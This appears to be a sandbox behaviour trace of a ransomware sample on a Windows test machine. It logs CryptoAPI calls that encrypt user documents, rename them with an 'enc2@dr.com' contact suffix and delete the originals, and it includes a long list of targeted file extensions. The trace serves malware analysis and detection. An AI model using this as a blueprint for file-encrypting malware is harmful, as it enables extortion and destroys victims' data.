	[0189.057] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb440) returned 1
	[0189.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.060] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.060] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.061] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95b0) returned 1
	[0189.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.061] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x4e73, dwBufLen=0x4e73 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x4e80) returned 1
	[0189.062] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.062] RtlMoveMemory (in: Destination=0xfe2000, Source=0xfdd180, Length=0x4e73 | out: Destination=0xfe2000) 
	[0189.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.062] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe2000*, pdwDataLen=0x18a1ec*=0x4e73, dwBufLen=0x4e80 | out: pbData=0xfe2000*, pdwDataLen=0x18a1ec*=0x4e80) returned 1
	[0189.063] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.063] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0189.063] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.063] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0189.063] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.063] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0189.064] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.064] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.064] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.132] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.133] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 123
	[0189.134] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.134] WriteFile (in: hFile=0x390, lpBuffer=0xfe2000*, nNumberOfBytesToWrite=0x4e80, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe2000*, lpNumberOfBytesWritten=0x18a648*=0x4e80, lpOverlapped=0x0) returned 1
	[0189.138] CloseHandle (hObject=0x390) returned 1
	[0189.138] CloseHandle (hObject=0x388) returned 1
	[0189.138] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv")) returned 1
	[0189.144] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv")) returned 0
	[0189.149] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45363460, ftCreationTime.dwHighDateTime=0x1d97603, ftLastAccessTime.dwLowDateTime=0x9079bd90, ftLastAccessTime.dwHighDateTime=0x1d976a1, ftLastWriteTime.dwLowDateTime=0x9079bd90, ftLastWriteTime.dwHighDateTime=0x1d976a1, nFileSizeHigh=0x0, nFileSizeLow=0x14603, dwReserved0=0x0, dwReserved1=0x0, cFileName="Deo9RSF3B2DX88.xls", cAlternateFileName="DEO9RS~1.XLS")) returned 1
	[0189.149] lstrcmpW (lpString1="Deo9RSF3B2DX88.xls", lpString2="..") returned 1
	[0189.149] lstrcmpW (lpString1="Deo9RSF3B2DX88.xls", lpString2=".") returned 1
	[0189.149] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.149] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="Deo9RSF3B2DX88.xls" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Deo9RSF3B2DX88.xls") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Deo9RSF3B2DX88.xls"
	[0189.149] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Deo9RSF3B2DX88.xls") returned 90
	[0189.150] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.150] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Deo9RSF3B2DX88.xls", cchLength=0x5a | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls") returned 0x5a
	[0189.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.150] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.150] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls"
	[0189.150] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls") returned 90
	[0189.151] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.151] StrStrW (lpFirst=".xls", lpSrch=".") returned=".xls"
	[0189.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.151] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xls") returned=".xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.152] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.152] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.152] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.156] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x14603, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x14603, lpOverlapped=0x0) returned 1
	[0189.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.165] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb440) returned 1
	[0189.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.168] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.168] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.168] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9130) returned 1
	[0189.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.169] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x14603, dwBufLen=0x14603 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x14610) returned 1
	[0189.171] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.171] RtlMoveMemory (in: Destination=0xff1790, Source=0xfdd180, Length=0x14603 | out: Destination=0xff1790) 
	[0189.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.172] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff1790*, pdwDataLen=0x18a1ec*=0x14603, dwBufLen=0x14610 | out: pbData=0xff1790*, pdwDataLen=0x18a1ec*=0x14610) returned 1
	[0189.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.197] CryptDestroyKey (hKey=0xfb9130) returned 1
	[0189.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.197] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0189.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.198] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0189.198] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.198] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.199] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
